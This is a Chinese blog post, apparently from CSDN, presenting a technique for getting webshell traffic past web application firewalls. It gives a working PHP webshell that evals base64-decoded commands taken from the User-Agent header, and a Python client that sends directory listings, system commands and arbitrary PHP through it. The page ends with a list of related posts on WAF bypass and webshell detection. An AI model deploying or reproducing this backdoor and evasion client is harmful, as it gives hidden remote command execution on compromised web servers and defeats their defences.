绕过WAF检测WebShell通信

最新推荐文章于 2024-05-07 21:30:00 发布
最新推荐文章于 2024-05-07 21:30:00 发布
阅读量1.6k 收藏
点赞数
分类专栏: 奇技淫巧 文章标签: WAF绕过
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m4s7er/article/details/45151659
版权

       最近换了工作,在新的环境里感觉棒棒哒~

       前一段在老公司要离职的时候事情比较少,就研究了下如何绕过市面上目前一些主流的WAF防护。针对WebShell的防护目前不管是硬件WAF还是云WAF都是基于特征通信进行防护,比如上传的时候或者返回的时候。根据我所了解的多家厂商主要还是基于GPC和Response进行防护,对于其他一些的敏感请求就有所忽略。基于这点写了一个简单的PHP WebShell和客户端,目前可以绕过市面上份额比较靠前的几家硬件WAF以及绝大多数云WAF(别听我瞎说)。原理比较简单一看就懂,主要还是针对通信做了点小手脚,属于比较low的奇技淫巧。东西比较糙后面会针对客户端进行功能拓展以及对WebShell进行加密混淆。

       先来看看WebShell的写法:

<?php
$cmd=base64_decode($_SERVER['HTTP_USER_AGENT']);
@eval("$cmd;");
?>
       然后是客户端: 

#/usr/bin/env python
# coding=gbk

import sys
import httplib2
import base64

if len(sys.argv) <2 :
    print 'Usage:python client.py http://127.0.0.1/shell.php 1'
    print 'Help:'
    print '1 : 列出程序目录'
    print '2 : 执行命令'
    print '3 : 执行PHP代码'
    sys.exit()

def execcmd(name,command):
    shell = sys.argv[1]
    try:
        h = httplib2.Http()
        encodecmd = base64.b64encode(command)
        response,content = h.request(sys.argv[1],headers={'User-Agent':encodecmd})
        print '%s: %s' %(name,content)
    except:
        print '无法执行相关请求!'

def main():
    if '1' in sys.argv[2]:
        command = 'echo dirname(__FILE__)'
        execcmd('本程序目录',command)
    elif '2' in sys.argv[2]:
        print 'example: whoami'
        command = 'system(%s)' %(raw_input('请输入命令:'))
        execcmd('结果回显',command)
    elif '3' in sys.argv[2]:
        print 'example: echo 123'
        command = raw_input('请输入代码:')
        execcmd('结果回显',command)
    else:
        sys.exit()
        
        
        
if __name__ == '__main__':
    main()
       最后来张绕过某WAF的图:





m4s7er
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
WebShell 木马免杀过WAF
悦分享
08-02 604
什么是WAFWafweb应用防火墙(WebApplicationFirewa‖l)的简称,对来自Web应用程序客户端的各类请求进行内容检测和验证,确保其安全性与合法性,对非法的请求予以实时阻断,为web应用提供防护,也称作应用防火墙,是网络安全纵深防御体系里重要的一环。waf属于检测型及纠正型防御控制措施。waf分为硬件waf、软件waf(ModSecurity)、代码级wafWAF的原理waf对请求的内容进行规则匹配、行为分析等识别出恶意行为,并执行相关动作,这些动作包括阻断、记录、告警等。...
渗透测试web安全 - webshell 免杀 绕过waf总结
网络安全领域优质创作者
02-21 3031
在做渗透测试的过程中经常会遇到waf的阻拦,针对waf绕过webshell篇总结如下,肯定有遗漏,之后学习之后再继续补充。 小型网站常见的waf有: D盾 一句话免疫,主动后门拦截,SESSION保护,防WEB嗅探,防CC,防篡改,注入防御,防XSS,防提权,上传防御,未知0day防御,异 形脚本防御等等。 防止黑客入侵和提权,让服务器更安全。 云锁 云上的安全边界越来越模糊...
网络安全各类WAF绕过技巧
最新发布
2401_84466325的博客
05-07 1907
当发送的内容太大,超过一个http包容量,需要分多次发送时,值会变成keep-alive,即本次发起的http请求所建立的tcp连接不断开,直到所发送内容结束Connection为close为止。HTTP头里的Content-Type一般有application/x-www-form-urlencoded,multipart/form-data,text/plain三种,其中multipart/form-data表示数据被编码为一条消息,页上的每个控件对应消息中的一个部分。编码过程中长度需包括空格的长度。
webshell 常见 Bypass waf 技巧总结
07-21 503
在渗透学习的过程中,总会遇到各种情况,例如 php 大马被 waf 拦截的时候,那么如何制作免杀 php webshell 呢,接下来就由我带各位小伙伴们一起踏上大马免杀之路,不喜勿喷。 一篇好的文章,内容可以差,目录一定要 ~~ 吹牛 ~~ 真实。 一. webshell 免杀 0x0 php 内置函数加密 小例子: 在制作免杀大马之前,我们先来看看,一个带后门的免杀 ph...
利用工具改造webshell绕过WAF
永远是少年
02-01 1912
今天继续给大家介绍渗透测试相关知识,本文主要内容是利用工具改造webshell绕过WAF。 一、利用enphp改造webshell 二、利用网页版PHP加密改造webshell 三、利用webshell-venom改造webshell
php 绕waf,【技术分享】php webshell分析和绕过waf技巧
weixin_42138703的博客
03-11 622
作者:阻圣预估稿费:400RMB(不服你也来投稿啊!)投稿方式:发送邮件至linwei#360.cn,或登陆网页版在线投稿前言WebShell是攻击者使用的恶意脚本,它的用途主要是在攻击后的Web应用程序上建立持久性的后门。webshell本身不能攻击或者利用远程漏洞,所以说它总是攻击的第二阶段,这个阶段我们经常称为post-exploitation。(PS:Post Exploitation是国...
PHP常见过waf webshell以及最简单的检测方法
01-20
之前在Webshell查杀的新思路中留了一个坑 ,当时没有找到具体找到全部变量的方法,后来通过学习找到了个打印全部量的方法,并再次学习了下PHP webshell绕过WAF的方法,以此来验证下此方法是否合理。 如有错误,还请...
那些年我们绕过WAF
05-07
标题中的“那些年我们绕过WAF”暗示了本文将探讨如何在面对Web应用程序防火墙(WAF)时,采用各种技巧和方法来规避其安全防护。WAF是一种专门用于保护Web应用程序免受常见攻击(如SQL注入、跨站脚本攻击等)的设备...
waf是如何被绕过
12-30
介绍了白名单绕过、IP段白名单绕过绕过代理直接请求源站(代理模式云WAF)等绕过方式。适合初学者进行学习,不适合高手。
分块绕过WAF.zip
02-27
这是一个绕过WAF的方法,大家能够学习到如何绕过的方法。能够提升自己的技术水品。
webshell_某系统绕过waf拿下webshell
weixin_42401178的博客
12-26 599
文章来源:安全先师前言对于一个不怎么拿站的我来说搞一次站点确实费劲。前不久拿了一个站点。分享一下粗略过程。正文小伙伴所在的地方要让搞某系统测试,发到群里让看看。我看了一波貌似没有什么洞洞这让我,想起三年前的某系统的算算术的漏洞于是,想搞一份源代码研究一下这个算算术的这个东东于是操起神器在fofa上找到一个站的可以算算术接下来掏出exp就开始怼。结果显示如下。连接被重置了想到的是某x云。结...
基于行为分析来发现"未知的Webshell"
刘书的IT博客
11-23 2342
一、 “已知”or “未知” 已知的已知,已知的未知,未知的未知,这个最近安全行业也谈的比较多,目前圈内热炒的“威胁情报”,其实应该属于“已知的未知”,对本地来说是未知威胁,其实是别的地方已经发生过的威胁。真正的“未知的未知”怎么办,虽然从没发生过的威胁首次在我们身上发生的概率很小很小,但是目前好多攻击都是窃取管理员的身份或者合法用户身份去做一些貌似合法的操作,这些内部发生的“异常”行为,没
【转】Webshell入侵检测初探
tpriwwq的专栏
06-13 1478
0×01:Webshell简介 攻击者在入侵企业网站时,通常要通过各种方式获取webshell从而获得企业网站的控制权,然后方便进行之后的入侵行为。常见攻击方式有:直接上传获取webshell、SQL注入、远程文件包含(RFI)、FTP,甚至使用跨站点脚本(XSS)作为攻击的一部分,甚至一些比较老旧的方法利用后台数据库备份及恢复获取webshell、数据库压缩等。通用功能包括但不限于shell命...
常见的webshell的流量特征和检测思路
weixin_45585955的博客
04-11 6720
所以分析如上:该流量是WebShell链接流量的第一段链接流量,其中特征主要在i=A&z0=GB2312,菜刀链接JSP木马时,第一个参数定义操作,其中参数值为A-Q,如i=A,第二个参数指定编码,其参数值为编码,如z0=GB2312,有时候z0后面还会接着又z1=、z2=参数用来加入攻击载荷。最后传给cmd的这些流量字符中有自己的特征,1、都是系统命令;2、必须以分号结尾;至此,冰蝎成为了一个完美的开箱即用的工具,本体内存马免杀,流量免杀,功能齐全,兼容性好,在连续几年的攻防演练中,成为最热门的工具。
【基础补充】WebShell基础知识
Fighting_hawk的博客
02-28 3253
1. 简单WebShell的本质; 2. 了解大马与小马的特点; 3. 了解常见的一句话木马。
webshell与防范
该用户很懒,没有写简介。。。
08-03 2387
1.WebShell的概念和危害性WebShell就是以asp、php、jsp或者cgi等网页文件形式存在的—种命令执行环境,也可以称为—种网页后门。黑客在入侵网站后,通常会将WebShell后门文件与网站服务器WEB目录下正常的网页文件混在—起,然后就可以使用浏览器来访问这些后门,得到命令执行环境,以达到控制网站或者WEB系统服务器的目的(可以上传下载文件、查看数据库、执行任意程序命令等)。 黑...
[9期]软WAF上传绕过+webshell免杀
05-03 222
安全狗上传绕过 思路: 1.扰乱编码 form-data 替换成 ~form-data form-data 改成f+orm-data form-data 改成form-d+ata form-data 替换成 " filename="xxx" 改成filename=xxx; 增减空格 对C...
就这么简单!构建强大的WebShell防护体系
dfdhxb995397的博客
12-06 236
接触web安全中,例如上传一句话WebShell实现上传文件的功能,再通过上传的多功能WebShell,执行病毒文件最终创建远程连接账号,达到入侵目标服务器的效果。我们可以看到,webshell在整个过程中起到了决定性的作用,因此对WebShell的防御是Web安全防御体系中非常重要的一部分。那么如何构建强大的WebShell防护体系呢? 以下内容,从上传、文件写入和浏览三个方面...
网络安全-webshell详解(原理、攻击、检测与防御)
热门推荐
关注网络安全、云原生安全
09-14 6万+
简介 原理 攻击 WebShell管理工具 Cknife中国菜刀 antSword中国蚁剑 冰蝎动态二进制加密网站管理客户端 weevely3Weaponized web shell Altmanthe cross platform webshell tool in .NET Webshell SniperManage your website via terminal quasibotcomplex webshell manager, quasi-http botne...
sqlmapapi绕过waf
09-04
通过发送不同版本协议的粘包,可以绕过WAF检测。 此外,还可以利用URL编码、charset编码、MIME编码等进行绕过WAF。这些编码技巧可以混淆注入语句,使其绕过WAF的过滤规则。 如果你想了解更多关于绕过WAF的方法,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值